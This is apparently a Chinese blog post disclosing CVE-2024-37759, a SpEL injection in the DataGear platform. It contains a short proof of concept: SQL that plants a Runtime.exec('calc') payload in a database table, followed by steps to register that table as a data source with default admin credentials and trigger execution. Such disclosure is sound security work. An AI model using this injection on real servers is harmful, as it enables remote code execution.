DataGear数据可视化分析平台存在SpEL表达式注入漏洞(CVE-2024-37759)

问题描述

CVE-2024-37759是DataGear数据可视化分析平台中的一个安全漏洞,涉及SpEL(Spring Expression Language)表达式注入。该漏洞可能允许攻击者通过构造恶意表达式,在服务器端执行任意代码,从而导致严重的安全风险。

poc

准备恶意数据库表

CREATE DATABASE evil;

CREATE TABLE `evil` (
  `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}");

第二步:添加恶意数据库源

    1. 登录 http://localhost:50401,默认账号密码为 admin/admin。
    1. 在架构添加界面中添加此 MySQL 数据库:/schema/saveAdd
    1. 选择"数据源"—"数据源添加",填写刚才创建的恶意数据库地址。

第三步:触发漏洞执行代码

打开刚才添加的数据库,然后单击"查看"按钮,将执行 SpEL 表达式。

漏洞脚本

GitHub - crumbledwall/CVE-2024-37759_PoC: PoC of CVE-2024-37759

漏洞来源

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值